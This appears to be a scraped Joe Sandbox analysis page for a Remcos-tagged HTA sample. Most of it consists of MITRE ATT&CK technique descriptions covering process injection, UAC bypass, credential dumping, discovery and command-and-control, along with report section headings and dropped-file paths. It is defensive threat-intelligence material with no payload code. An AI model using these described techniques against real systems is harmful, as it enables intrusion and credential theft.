Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nicegirlforyou.hta

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
nicegirlforyou.hta

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre